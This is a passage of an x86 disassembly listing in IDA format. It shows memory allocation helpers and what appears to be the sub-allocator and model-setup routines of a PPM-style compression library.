mov eax, [esi]
mov eax, [eax+7]
mov [ecx+40D7F8h], eax
mov eax, [esi]
cmp byte ptr [eax+18h], 0Fh
ja short loc_9B2331
cmp dword ptr [esi+18h], 1
jbe short loc_9B2329
mov eax, [esi+10h]
test byte ptr [eax+3], 8
jz short loc_9B2329
xor eax, eax
inc eax
jmp short loc_9B232B
; ---------------------------------------------------------------------------
loc_9B2329: ; CODE XREF: sub_9B221A+FF�j
; sub_9B221A+108�j
xor eax, eax
loc_9B232B: ; CODE XREF: sub_9B221A+10D�j
push ecx
push eax
push 0Fh
jmp short loc_9B2354
; ---------------------------------------------------------------------------
loc_9B2331: ; CODE XREF: sub_9B221A+F9�j
cmp dword ptr [esi+18h], 1
jnz short loc_9B2343
test byte ptr [eax+3], 10h
jz short loc_9B2343
add word ptr [eax+3], 0FFF0h
loc_9B2343: ; CODE XREF: sub_9B221A+11B�j
; sub_9B221A+121�j
mov eax, [esi]
push ecx
xor ecx, ecx
mov cl, [eax+3]
movzx eax, byte ptr [eax+18h]
and ecx, 10h
push ecx
push eax
loc_9B2354: ; CODE XREF: sub_9B221A+115�j
push dword ptr [esi+1Ch]
call sub_9B1DD3
add esp, 10h
test eax, eax
jnz loc_9B2266
mov eax, [esi]
test byte ptr [eax+3], 10h
jz loc_9B2266
loc_9B2373: ; CODE XREF: sub_9B221A+AF�j
push dword ptr [eax+28h] ; Memory
jmp loc_9B224C
; ---------------------------------------------------------------------------
loc_9B237B: ; CODE XREF: sub_9B221A+6C�j
call edi ; free
push dword ptr [esi] ; Memory
call edi ; free
mov eax, [esi+0Ch]
test eax, eax
pop ecx
pop ecx
jz short loc_9B2396
add eax, 40D7CCh
push eax
call sub_9B3A3D
pop ecx
loc_9B2396: ; CODE XREF: sub_9B221A+16E�j
inc dword ptr [esi+18h]
xor eax, eax
loc_9B239B: ; CODE XREF: sub_9B221A+7D�j
pop edi
pop esi
pop ebp
retn
sub_9B221A endp
; =============== S U B R O U T I N E =======================================
sub_9B239F proc near ; CODE XREF: sub_9B02F5+C2�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+20h]
test eax, eax
push edi
mov edi, [esi+0Ch]
jz short loc_9B23B6
push eax
call sub_9B4F5C
pop ecx
loc_9B23B6: ; CODE XREF: sub_9B239F+E�j
add edi, 408B10h
push edi
call sub_9B36D0
push dword ptr [esi+10h] ; Memory
mov edi, free
call edi ; free
push dword ptr [esi+0Ch]
call sub_9B0DBC
mov eax, [esi+0Ch]
add esp, 0Ch
test eax, eax
jz short loc_9B23EB
add eax, 40D7CCh
push eax
call sub_9B3A3D
pop ecx
loc_9B23EB: ; CODE XREF: sub_9B239F+3E�j
push dword ptr [esi+0Ch] ; Memory
call edi ; free
pop ecx
pop edi
pop esi
retn
sub_9B239F endp
; =============== S U B R O U T I N E =======================================
sub_9B23F4 proc near ; CODE XREF: sub_9B2497+25�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr [eax], 0
and dword ptr [eax+4], 0
retn
sub_9B23F4 endp
; =============== S U B R O U T I N E =======================================
sub_9B2400 proc near ; CODE XREF: sub_9B24D9+2A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B241E
mov eax, [esi]
test eax, eax
jz short loc_9B2417
push eax ; Memory
call free
pop ecx
loc_9B2417: ; CODE XREF: sub_9B2400+D�j
and dword ptr [esi], 0
and dword ptr [esi+4], 0
loc_9B241E: ; CODE XREF: sub_9B2400+7�j
pop esi
retn
sub_9B2400 endp
; =============== S U B R O U T I N E =======================================
sub_9B2420 proc near ; CODE XREF: sub_9B4C4B+76�p
; sub_9B4C4B+15E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
add [esi+4], eax
mov eax, [esi+4]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; NewSize
push dword ptr [esi] ; Memory
call sub_9B2565
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jnz short loc_9B2447
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B2447: ; CODE XREF: sub_9B2420+23�j
mov esi, [esi+4]
push 28h ; Size
lea ecx, [esi+esi*4]
lea eax, [eax+ecx*8-28h]
push 0 ; Val
push eax ; Dst
call memset
add esp, 0Ch
xor eax, eax
inc eax
pop esi
retn
sub_9B2420 endp
; =============== S U B R O U T I N E =======================================
sub_9B2463 proc near ; CODE XREF: sub_9B0E04+86�p
; sub_9B0E04+168�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
add [esi+4], eax
mov eax, [esi+4]
shl eax, 2
push eax ; NewSize
push dword ptr [esi] ; Memory
call sub_9B2565
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jnz short loc_9B248A
and [esi+4], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B248A: ; CODE XREF: sub_9B2463+20�j
mov ecx, [esi+4]
and dword ptr [eax+ecx*4-4], 0
xor eax, eax
inc eax
pop esi
retn
sub_9B2463 endp
; =============== S U B R O U T I N E =======================================
sub_9B2497 proc near ; CODE XREF: sub_9B0E04+95�p
; sub_9B0E04:loc_9B0F0D�p
push esi
push edi
push 54h ; Size
call sub_9B254A
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_9B24AD
xor eax, eax
jmp short loc_9B24D6
; ---------------------------------------------------------------------------
loc_9B24AD: ; CODE XREF: sub_9B2497+10�j
lea eax, [esi+10h]
push eax
mov [esi], edi
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
call sub_9B23F4
pop ecx
mov [esi+1Ch], edi
mov [esi+20h], edi
mov [esi+2Ch], edi
mov [esi+28h], edi
mov [esi+24h], edi
mov [esi+50h], edi
mov eax, esi
loc_9B24D6: ; CODE XREF: sub_9B2497+14�j
pop edi
pop esi
retn
sub_9B2497 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B24D9(void *Memory)
sub_9B24D9 proc near ; CODE XREF: sub_9B06DE+12A�p
; sub_9B06DE+1B3�p ...
Memory = dword ptr 4
push esi
mov esi, [esp+4+Memory]
test esi, esi
jz short loc_9B250E
mov eax, [esi+1Ch]
test eax, eax
push edi
mov edi, free
jz short loc_9B24F4
push eax ; Memory
call edi ; free
pop ecx
loc_9B24F4: ; CODE XREF: sub_9B24D9+15�j
mov eax, [esi+20h]
test eax, eax
jz short loc_9B24FF
push eax ; Memory
call edi ; free
pop ecx
loc_9B24FF: ; CODE XREF: sub_9B24D9+20�j
lea eax, [esi+10h]
push eax
call sub_9B2400
push esi ; Memory
call edi ; free
pop ecx
pop ecx
pop edi
loc_9B250E: ; CODE XREF: sub_9B24D9+7�j
pop esi
retn
sub_9B24D9 endp
; =============== S U B R O U T I N E =======================================
sub_9B2510 proc near ; CODE XREF: sub_9B0DBC+32�p
; sub_9B0DBC+3E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B2548
push edi
xor edi, edi
cmp [esi+4], edi
jbe short loc_9B2532
loc_9B2521: ; CODE XREF: sub_9B2510+20�j
mov eax, [esi]
push dword ptr [eax+edi*4] ; Memory
call sub_9B24D9
inc edi
cmp edi, [esi+4]
pop ecx
jb short loc_9B2521
loc_9B2532: ; CODE XREF: sub_9B2510+F�j
mov eax, [esi]
test eax, eax
pop edi
jz short loc_9B2541
push eax ; Memory
call free
pop ecx
loc_9B2541: ; CODE XREF: sub_9B2510+27�j
and dword ptr [esi], 0
and dword ptr [esi+4], 0
loc_9B2548: ; CODE XREF: sub_9B2510+7�j
pop esi
retn
sub_9B2510 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B254A(size_t Size)
sub_9B254A proc near ; CODE XREF: sub_9B0E04+2BA�p
; sub_9B0E04+34F�p ...
Size = dword ptr 4
mov eax, [esp+Size]
test eax, eax
jz short loc_9B2562
cmp eax, 0B000000h
ja short loc_9B2562
push eax ; Size
call malloc
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B2562: ; CODE XREF: sub_9B254A+6�j
; sub_9B254A+D�j
xor eax, eax
retn
sub_9B254A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B2565(void *Memory,size_t NewSize)
sub_9B2565 proc near ; CODE XREF: sub_9B0E04+D6�p
; sub_9B0E04+431�p ...
Memory = dword ptr 8
NewSize = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+NewSize], 0
jz short loc_9B2598
cmp [ebp+NewSize], 0B000000h
ja short loc_9B2598
push [ebp+NewSize] ; NewSize
push [ebp+Memory] ; Memory
call realloc
test eax, eax
pop ecx
pop ecx
jnz short loc_9B259A
cmp [ebp+Memory], eax
jz short loc_9B2598
push [ebp+Memory] ; Memory
call free
pop ecx
loc_9B2598: ; CODE XREF: sub_9B2565+7�j
; sub_9B2565+10�j ...
xor eax, eax
loc_9B259A: ; CODE XREF: sub_9B2565+22�j
pop ebp
retn
sub_9B2565 endp
; =============== S U B R O U T I N E =======================================
sub_9B259C proc near ; CODE XREF: sub_9B28AE+4D�p
; sub_9B2C40+1B8�p
arg_0 = dword ptr 4
movsx ecx, word ptr [eax+ecx*2+0B8h]
movsx edx, word ptr [eax+edx*2+0B8h]
sub edx, ecx
push esi
mov esi, [esp+4+arg_0]
lea ecx, [ecx+ecx*2]
lea ecx, [esi+ecx*4]
movsx esi, word ptr [eax+edx*2+102h]
push edi
movsx edi, word ptr [eax+esi*2+0B8h]
cmp edi, edx
jz short loc_9B25E9
mov edi, [eax+esi*4+1Ch]
dec esi
mov [ecx], edi
mov [eax+esi*4+20h], ecx
movsx esi, word ptr [eax+esi*2+0B8h]
lea edi, [esi+esi*2]
lea ecx, [ecx+edi*4]
sub edx, esi
loc_9B25E9: ; CODE XREF: sub_9B259C+30�j
movsx edx, word ptr [eax+edx*2+102h]
lea eax, [eax+edx*4+20h]
mov edx, [eax]
pop edi
mov [ecx], edx
mov [eax], ecx
pop esi
retn
sub_9B259C endp
; =============== S U B R O U T I N E =======================================
sub_9B25FE proc near ; CODE XREF: sub_9B2613+12�p
; sub_9B36D0+9�j ...
cmp dword ptr [eax+1Ch], 0
jz short locret_9B2612
push dword ptr [eax+10h] ; Memory
and dword ptr [eax+1Ch], 0
call free
pop ecx
locret_9B2612: ; CODE XREF: sub_9B25FE+4�j
retn
sub_9B25FE endp
; =============== S U B R O U T I N E =======================================
sub_9B2613 proc near ; CODE XREF: sub_9B36DE+16�p
; sub_9B3705+CC�p
push ebx
mov ebx, eax
shl ebx, 14h
cmp [edi+1Ch], ebx
jnz short loc_9B2623
xor eax, eax
inc eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B2623: ; CODE XREF: sub_9B2613+9�j
mov eax, edi
call sub_9B25FE
cmp ebx, 83FFFF4h
jbe short loc_9B2636
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B2636: ; CODE XREF: sub_9B2613+1D�j
push esi
push 0Ch
xor edx, edx
pop ecx
mov eax, ebx
div ecx
inc eax
lea esi, [eax+eax*2]
shl esi, 2
push esi ; Size
call malloc
test eax, eax
pop ecx
mov [edi+10h], eax
jz short loc_9B2663
lea eax, [eax+esi-0Ch]
mov [edi+8], eax
xor eax, eax
mov [edi+1Ch], ebx
inc eax
loc_9B2663: ; CODE XREF: sub_9B2613+41�j
pop esi
pop ebx
retn
sub_9B2613 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2666 proc near ; CODE XREF: sub_9B2A03+25�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push edi
push 98h ; Size
lea eax, [esi+20h]
push 0 ; Val
push eax ; Dst
call memset
mov edi, [esi+1Ch]
add esp, 0Ch
push 8
pop ebx
mov eax, edi
cdq
idiv ebx
push 0Ch
pop ebx
xor edx, edx
push 0Ch
mov ecx, [esi+10h]
mov [esi], ecx
div ebx
xor edx, edx
mov ebx, eax
imul ebx, 54h
sub edi, ebx
mov eax, edi
mov [ebp+var_4], eax
pop edi
div edi
push 0Ch
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
lea edi, [eax+ecx]
mov eax, [ebp+var_4]
add ecx, eax
mov [esi+0Ch], ecx
pop ecx
xor edx, edx
mov eax, ebx
div ecx
push 4
mov [esi+4], edi
mov [esi+14h], edi
lea ecx, [esi+0B8h]
lea eax, [eax+eax*2]
lea eax, [edi+eax*4]
pop edi
mov [esi+18h], eax
xor eax, eax
push 2
inc eax
mov edx, edi
pop ebx
loc_9B26E3: ; CODE XREF: sub_9B2666+84�j
mov [ecx], ax
add ecx, ebx
inc eax
dec edx
jnz short loc_9B26E3
inc eax
lea ecx, [esi+0C0h]
mov edx, edi
loc_9B26F5: ; CODE XREF: sub_9B2666+97�j
mov [ecx], ax
add ecx, ebx
add eax, ebx
dec edx
jnz short loc_9B26F5
inc eax
lea ecx, [esi+0C8h]
mov edx, edi
loc_9B2708: ; CODE XREF: sub_9B2666+AB�j
mov [ecx], ax
add ecx, ebx
add eax, 3
dec edx
jnz short loc_9B2708
push 1Ah
inc eax
lea ecx, [esi+0D0h]
pop edx
loc_9B271D: ; CODE XREF: sub_9B2666+BF�j
mov [ecx], ax
add ecx, ebx
add eax, edi
dec edx
jnz short loc_9B271D
xor edx, edx
xor eax, eax
mov [esi+204h], dx
lea ecx, [esi+104h]
loc_9B2738: ; CODE XREF: sub_9B2666+F3�j
lea edi, [edx+1]
movsx edx, word ptr [esi+eax*2+0B8h]
xor ebx, ebx
cmp edx, edi
setl bl
mov edx, edi
add eax, ebx
mov [ecx], ax
inc ecx
inc ecx
cmp edx, 80h
jl short loc_9B2738
pop edi
pop ebx
leave
retn
sub_9B2666 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B275F proc near ; CODE XREF: sub_9B28AE+15�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ecx+14h]
cmp eax, [ecx+18h]
jz short loc_9B2770
mov byte ptr [eax], 0
loc_9B2770: ; CODE XREF: sub_9B275F+C�j
push ebx
push esi
push edi
lea eax, [ebp+var_C]
push 26h
mov [ebp+var_8], eax
mov [ebp+var_C], eax
lea edx, [ecx+20h]
lea esi, [ecx+0B8h]
pop edi
jmp short loc_9B27B1
; ---------------------------------------------------------------------------
loc_9B278A: ; CODE XREF: sub_9B275F+55�j
mov eax, [edx]
mov ebx, [eax]
mov [edx], ebx
lea ebx, [ebp+var_C]
mov [eax+4], ebx
mov ebx, [ebp+var_C]
mov [eax], ebx
mov ebx, [ebp+var_C]
mov [ebx+4], eax
mov [ebp+var_C], eax
or word ptr [eax+8], 0FFFFh
mov bx, [esi]
mov [eax+0Ah], bx
loc_9B27B1: ; CODE XREF: sub_9B275F+29�j
; sub_9B275F+5D�j
cmp dword ptr [edx], 0
jnz short loc_9B278A
inc esi
inc esi
add edx, 4
dec edi
jnz short loc_9B27B1
mov eax, [ebp+var_C]
lea esi, [ebp+var_C]
cmp eax, esi
mov edx, eax
jz loc_9B289E
jmp short loc_9B27F9
; ---------------------------------------------------------------------------
loc_9B27D0: ; CODE XREF: sub_9B275F+AA�j
movzx esi, word ptr [eax+0Ah]
movzx edi, word ptr [edx+0Ah]
add esi, edi
cmp esi, 10000h
jge short loc_9B280B
mov esi, [eax+4]
mov edi, [eax]
mov [esi], edi
mov esi, [eax]
mov edi, [eax+4]
mov [esi+4], edi
mov ax, [eax+0Ah]
add [edx+0Ah], ax
loc_9B27F9: ; CODE XREF: sub_9B275F+6F�j
; sub_9B275F+B3�j
movzx eax, word ptr [edx+0Ah]
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp word ptr [eax+8], 0FFFFh
jz short loc_9B27D0
loc_9B280B: ; CODE XREF: sub_9B275F+81�j
mov edx, [edx]
lea eax, [ebp+var_C]
cmp edx, eax
jnz short loc_9B27F9
jmp loc_9B289B
; ---------------------------------------------------------------------------
loc_9B2819: ; CODE XREF: sub_9B275F+144�j
mov edi, [eax]
lea edx, [eax+4]
mov esi, [edx]
mov [esi], edi
mov edx, [edx]
mov esi, [eax]
mov [esi+4], edx
movzx edx, word ptr [eax+0Ah]
cmp edx, 80h
jle short loc_9B285E
lea esi, [edx-81h]
shr esi, 7
inc esi
mov edi, esi
neg edi
shl edi, 7
add edx, edi
loc_9B2848: ; CODE XREF: sub_9B275F+FD�j
mov edi, [ecx+0B4h]
mov [eax], edi
mov [ecx+0B4h], eax
add eax, 600h
dec esi
jnz short loc_9B2848
loc_9B285E: ; CODE XREF: sub_9B275F+D4�j
movsx edi, word ptr [ecx+edx*2+102h]
movsx esi, word ptr [ecx+edi*2+0B8h]
cmp esi, edx
jz short loc_9B2891
movsx ebx, word ptr [ecx+edi*2+0B6h]
dec edi
mov esi, edx
sub esi, ebx
sub edx, esi
lea esi, [ecx+esi*4+1Ch]
mov ebx, [esi]
lea edx, [edx+edx*2]
lea edx, [eax+edx*4]
mov [edx], ebx
mov [esi], edx
loc_9B2891: ; CODE XREF: sub_9B275F+111�j
lea edx, [ecx+edi*4+20h]
mov esi, [edx]
mov [eax], esi
mov [edx], eax
loc_9B289B: ; CODE XREF: sub_9B275F+B5�j
mov eax, [ebp+var_C]
loc_9B289E: ; CODE XREF: sub_9B275F+69�j
lea edx, [ebp+var_C]
cmp eax, edx
jnz loc_9B2819
pop edi
pop esi
pop ebx
leave
retn
sub_9B275F endp
; =============== S U B R O U T I N E =======================================
sub_9B28AE proc near ; CODE XREF: sub_9B2934+45�p
; sub_9B2981+26�p
cmp word ptr [esi+204h], 0
jnz short loc_9B28D7
mov ecx, esi
mov word ptr [esi+204h], 0FFh
call sub_9B275F
lea ecx, [esi+edi*4+20h]
mov eax, [ecx]
test eax, eax
jz short loc_9B28D7
mov edx, [eax]
mov [ecx], edx
retn
; ---------------------------------------------------------------------------
loc_9B28D7: ; CODE XREF: sub_9B28AE+8�j
; sub_9B28AE+22�j
mov edx, edi
lea eax, [esi+edi*4+20h]
loc_9B28DD: ; CODE XREF: sub_9B28AE+3B�j
inc edx
add eax, 4
cmp edx, 26h
jz short loc_9B2905
cmp dword ptr [eax], 0
jz short loc_9B28DD
push ebx
mov ebx, [esi+edx*4+20h]
mov eax, [ebx]
mov [esi+edx*4+20h], eax
push ebx
mov ecx, edi
mov eax, esi
call sub_9B259C
pop ecx
mov eax, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B2905: ; CODE XREF: sub_9B28AE+36�j
dec word ptr [esi+204h]
movsx eax, word ptr [esi+edi*2+0B8h]
mov ecx, [esi+0Ch]
mov edx, ecx
sub edx, [esi]
lea eax, [eax+eax*2]
shl eax, 2
cmp edx, eax
jle short loc_9B2931
sub ecx, eax
sub [esi+4], eax
mov eax, [esi+4]
mov [esi+0Ch], ecx
retn
; ---------------------------------------------------------------------------
loc_9B2931: ; CODE XREF: sub_9B28AE+75�j
xor eax, eax
retn
sub_9B28AE endp
; =============== S U B R O U T I N E =======================================
sub_9B2934 proc near ; CODE XREF: sub_9B29AF+25�p
; sub_9B2A03+7B�p ...
push esi
mov esi, ecx
push edi
movsx edi, word ptr [esi+eax*2+102h]
lea ecx, [esi+edi*4+20h]
mov eax, [ecx]
test eax, eax
jz short loc_9B2950
mov edx, [eax]
mov [ecx], edx
jmp short loc_9B297E
; ---------------------------------------------------------------------------
loc_9B2950: ; CODE XREF: sub_9B2934+14�j
mov eax, [esi+14h]
lea edx, [esi+edi*2+0B8h]
movsx ecx, word ptr [edx]
lea ecx, [ecx+ecx*2]
lea ecx, [eax+ecx*4]
cmp ecx, [esi+18h]
mov [esi+14h], ecx
jbe short loc_9B297E
movsx eax, word ptr [edx]
lea eax, [eax+eax*2]
shl eax, 2
sub ecx, eax
mov [esi+14h], ecx
call sub_9B28AE
loc_9B297E: ; CODE XREF: sub_9B2934+1A�j
; sub_9B2934+35�j
pop edi
pop esi
retn
sub_9B2934 endp
; =============== S U B R O U T I N E =======================================
sub_9B2981 proc near ; CODE XREF: sub_9B2A03+45�p
; sub_9B2E12+115�p
push esi
mov esi, eax
mov eax, [esi+18h]
cmp eax, [esi+14h]
jz short loc_9B2994
add eax, 0FFFFFFF4h
mov [esi+18h], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B2994: ; CODE XREF: sub_9B2981+9�j
cmp dword ptr [esi+20h], 0
jz short loc_9B29A4
mov eax, [esi+20h]
mov ecx, [eax]
mov [esi+20h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B29A4: ; CODE XREF: sub_9B2981+17�j
push edi
xor edi, edi
call sub_9B28AE
pop edi
pop esi
retn
sub_9B2981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B29AF proc near ; CODE XREF: sub_9B2F62+178�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
movsx eax, word ptr [edi+esi*2+102h]
movsx ecx, word ptr [edi+esi*2+104h]
cmp eax, ecx
mov [ebp+var_4], eax
jnz short loc_9B29CF
mov eax, ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B29CF: ; CODE XREF: sub_9B29AF+1A�j
lea eax, [esi+1]
mov ecx, edi
call sub_9B2934
test eax, eax
mov [ebp+var_8], eax
jz short loc_9B29FE
lea ecx, [esi+esi*2]
shl ecx, 2
push ecx ; Size
push ebx ; Src
push eax ; Dst
call memcpy
mov eax, [ebp+var_4]
lea eax, [edi+eax*4+20h]
mov ecx, [eax]
mov [ebx], ecx
add esp, 0Ch
mov [eax], ebx
loc_9B29FE: ; CODE XREF: sub_9B29AF+2F�j
mov eax, [ebp+var_8]
leave
retn
sub_9B29AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2A03 proc near ; CODE XREF: sub_9B2B65+10�p
; sub_9B2F62+A8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 100h ; Size
xor ebx, ebx
lea eax, [edi+888h]
push ebx ; Val
push eax ; Dst
call memset
add esp, 0Ch
lea esi, [edi+654h]
call sub_9B2666
mov eax, [edi+87Ch]
cmp eax, 0Ch
jl short loc_9B2A3B
push 0Ch
pop eax
loc_9B2A3B: ; CODE XREF: sub_9B2A03+33�j
or ecx, 0FFFFFFFFh
sub ecx, eax
mov eax, esi
mov [edi+884h], ecx
call sub_9B2981
cmp eax, ebx
mov [edi+8], eax
mov [edi+4], eax
jz short loc_9B2A95
mov [eax], ebx
mov eax, [edi+87Ch]
mov [edi+878h], eax
mov eax, [edi+4]
mov word ptr [eax+0Ah], 100h
mov eax, [edi+4]
mov word ptr [eax+8], 101h
mov eax, 80h
mov ecx, esi
call sub_9B2934
mov ecx, [edi+4]
mov [ecx+4], eax
mov eax, [edi+4]
mov eax, [eax+4]
cmp eax, ebx
mov [edi], eax
jnz short loc_9B2A9C
loc_9B2A95: ; CODE XREF: sub_9B2A03+52�j
xor eax, eax
jmp loc_9B2B61
; ---------------------------------------------------------------------------
loc_9B2A9C: ; CODE XREF: sub_9B2A03+90�j
mov eax, [edi+884h]
mov [edi+880h], eax
xor ecx, ecx
mov [edi+4C89h], bl
xor eax, eax
loc_9B2AB2: ; CODE XREF: sub_9B2A03+D6�j
mov edx, [edi+4]
mov edx, [edx+4]
mov [edx+eax+4], cl
mov edx, [edi+4]
mov edx, [edx+4]
mov byte ptr [edx+eax+5], 1
mov edx, [edi+4]
mov edx, [edx+4]
mov [eax+edx], ebx
add eax, 6
inc ecx
cmp eax, 600h
jl short loc_9B2AB2
lea eax, [edi+0C88h]
mov [ebp+var_4], ebx
mov [ebp+var_C], eax
loc_9B2AE7: ; CODE XREF: sub_9B2A03+133�j
mov ebx, [ebp+var_4]
mov eax, [ebp+var_C]
add ebx, 2
mov ecx, offset dword_9A6ABC
mov [ebp+var_8], eax
loc_9B2AF8: ; CODE XREF: sub_9B2A03+123�j
mov esi, [ebp+var_8]
mov [ebp+var_10], 8
loc_9B2B02: ; CODE XREF: sub_9B2A03+115�j
movzx eax, word ptr [ecx]
cdq
idiv ebx
mov edx, 4000h
sub edx, eax
mov [esi], dx
add esi, 10h
dec [ebp+var_10]
jnz short loc_9B2B02
add [ebp+var_8], 2
inc ecx
inc ecx
cmp ecx, offset byte_9A6ACC
jl short loc_9B2AF8
inc [ebp+var_4]
mov eax, 80h
add [ebp+var_C], eax
cmp [ebp+var_4], eax
jl short loc_9B2AE7
xor edx, edx
lea ecx, [edi+0Fh]
loc_9B2B3D: ; CODE XREF: sub_9B2A03+159�j
lea eax, [edx+edx*4+0Ah]
push 10h
shl eax, 3
pop esi
loc_9B2B47: ; CODE XREF: sub_9B2A03+153�j
mov byte ptr [ecx-1], 3
mov [ecx-3], ax
mov byte ptr [ecx], 4
add ecx, 4
dec esi
jnz short loc_9B2B47
inc edx
cmp edx, 19h
jl short loc_9B2B3D
xor eax, eax
inc eax
loc_9B2B61: ; CODE XREF: sub_9B2A03+94�j
pop esi
pop ebx
leave
retn
sub_9B2A03 endp
; =============== S U B R O U T I N E =======================================
sub_9B2B65 proc near ; CODE XREF: sub_9B36DE+22�j
; sub_9B3705+D9�p
push edi
mov edi, ecx
mov byte ptr [edi+4C88h], 1
mov [edi+87Ch], eax
call sub_9B2A03
test eax, eax
jnz short loc_9B2B80
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B2B80: ; CODE XREF: sub_9B2B65+17�j
push 9 ; Size
lea eax, [edi+0A8Ah]
push 4 ; Val
push eax ; Dst
mov byte ptr [edi+0A88h], 0
mov byte ptr [edi+0A89h], 2
call memset
push 0F5h ; Size
lea eax, [edi+0A93h]
push 6 ; Val
push eax ; Dst
call memset
add esp, 18h
xor eax, eax
loc_9B2BB6: ; CODE XREF: sub_9B2B65+5C�j
mov [edi+eax+988h], al
inc eax
cmp eax, 3
jl short loc_9B2BB6
push ebx
push esi
xor esi, esi
inc esi
mov edx, eax
mov ebx, esi
mov ecx, 100h
jmp short loc_9B2BE2
; ---------------------------------------------------------------------------
loc_9B2BD3: ; CODE XREF: sub_9B2B65+7F�j
dec esi
mov [edi+eax+988h], dl
jnz short loc_9B2BE1
inc ebx
mov esi, ebx
inc edx
loc_9B2BE1: ; CODE XREF: sub_9B2B65+76�j
inc eax
loc_9B2BE2: ; CODE XREF: sub_9B2B65+6C�j
cmp eax, ecx
jl short loc_9B2BD3
push 40h ; Size
lea eax, [edi+0B88h]
push 0 ; Val
push eax ; Dst
call memset
push 0C0h ; Size
lea eax, [edi+0BC8h]
push 8 ; Val
push eax ; Dst
call memset
add esp, 18h
pop esi
xor eax, eax
pop ebx
mov byte ptr [edi+64Eh], 7
inc eax
pop edi
retn
sub_9B2B65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2C1A proc near ; CODE XREF: sub_9B2C40+26�p
; sub_9B2F62+4C�p ...
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [ebp+var_8]
movsd
movsw
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
movsd
movsw
mov edi, [ebp+arg_4]
lea esi, [ebp+var_8]
movsd
movsw
pop edi
pop esi
leave
retn
sub_9B2C1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2C40 proc near ; CODE XREF: sub_9B3221+79�p
; sub_9B3221+ED�p ...
var_20 = byte ptr -20h
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
movzx ecx, word ptr [eax+0Ah]
mov [ebp+var_18], ecx
dec ecx
push ebx
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
push esi
lea edx, [eax+4]
push edi
mov [ebp+var_4], edx
jmp short loc_9B2C70
; ---------------------------------------------------------------------------
loc_9B2C61: ; CODE XREF: sub_9B2C40+32�j
lea esi, [ecx-6]
push esi
push ecx
call sub_9B2C1A
add esp, 8
mov ecx, esi
loc_9B2C70: ; CODE XREF: sub_9B2C40+1F�j
cmp ecx, [edx]
jnz short loc_9B2C61
mov edx, [edx]
add byte ptr [edx+5], 4
add word ptr [eax+8], 4
mov dx, [eax+8]
movzx esi, byte ptr [ecx+5]
movzx ebx, dx
xor edx, edx
sub ebx, esi
mov esi, [ebp+arg_0]
cmp [esi+878h], edx
setnz dl
mov [ebp+var_14], edx
movzx edx, byte ptr [ecx+5]
add edx, [ebp+var_14]
sar edx, 1
mov [ecx+5], dl
movzx dx, dl
mov [eax+8], dx
loc_9B2CB1: ; CODE XREF: sub_9B2C40+CE�j
movzx edx, byte ptr [ecx+0Bh]
mov esi, [ebp+var_14]
add ecx, 6
sub ebx, edx
mov [ebp+var_C], edx
add edx, esi
sar edx, 1
mov [ecx+5], dl
movzx dx, dl
add [eax+8], dx
mov dl, [ecx+5]
cmp dl, [ecx-1]
jbe short loc_9B2D0B
mov esi, ecx
lea edi, [ebp+var_20]
movsd
mov edx, ecx
movsw
loc_9B2CE1: ; CODE XREF: sub_9B2C40+C1�j
lea esi, [edx-6]
mov edi, edx
movsd
movsw
mov esi, [ebp+var_4]
sub edx, 6
cmp edx, [esi]
mov [ebp+var_C], edx
jz short loc_9B2D03
